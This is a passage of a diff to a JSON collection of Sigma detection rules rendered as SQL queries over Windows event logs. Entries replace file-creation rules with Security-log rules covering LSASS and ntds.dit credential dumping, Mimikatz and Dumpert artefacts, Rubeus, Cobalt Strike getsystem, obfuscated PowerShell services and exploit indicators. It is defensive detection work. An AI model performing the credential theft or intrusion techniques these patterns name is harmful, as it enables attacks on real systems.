ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_recent.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", - "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", + "title": "Suspicious Remote Logon with Explicit Credentials", + "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "status": "experimental", - "description": "Detects PowerShell creating a binary executable or script file.", - "author": "frack113", + "description": "Detects suspicious processes logging on with explicit credentials", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "tags": [ - "attack.persistence" + "attack.t1078", + "attack.lateral_movement" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Administrators that use the RunAS command or scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND 
(EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_powershell_drop_binary.yml" + "filename": "win_security_susp_logon_explicit_credentials.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "title": "Remote Access Tool Services Have Been Installed - Security", + "id": "c8b00925-926c-47e3-beea-298fd563728e", "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "The rule doesn't look for anything suspicious so false positives are expected. 
If you use one of the tools mentioned, comment it out" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_service_install_remote_access_software.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "HybridConnectionManager Service Installation", + 
"id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "description": "Rule to detect the Hybrid Connection Manager service installation.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "description": "Detects renaming of file while deletion with SDelete tool.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" ], "falsepositives": [ - "Legitimate add-ins" + "Legitimate usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' 
AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_susp_sdelete.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DCERPC SMB Spoolss Named Pipe", + "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "status": "test", + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "author": "OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Domain Controllers acting as printer servers too? 
:)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Searchprotocolhost.exe likes to query these registry keys. 
To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": 
"file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "Anydesk Temporary Artefact", - "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "title": "Remote Task Creation via ATSVC Named Pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within 
networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_anydesk_artefact.yml" + "filename": "win_security_atsvc_task.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], 
"falsepositives": [ - "Very unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "Installation of TeamViewer Desktop", - "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "TeamViewer_Desktop.exe is create during install", - "author": "frack113", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_install_teamviewer_desktop.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", - "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' 
OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "status": "test", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.execution", - "cve.2021.44077" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": 
"win_security_ad_object_writedac_access.yml" }, { - "title": "Suspicious PROCEXP152.sys File Created In TMP", - "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." 
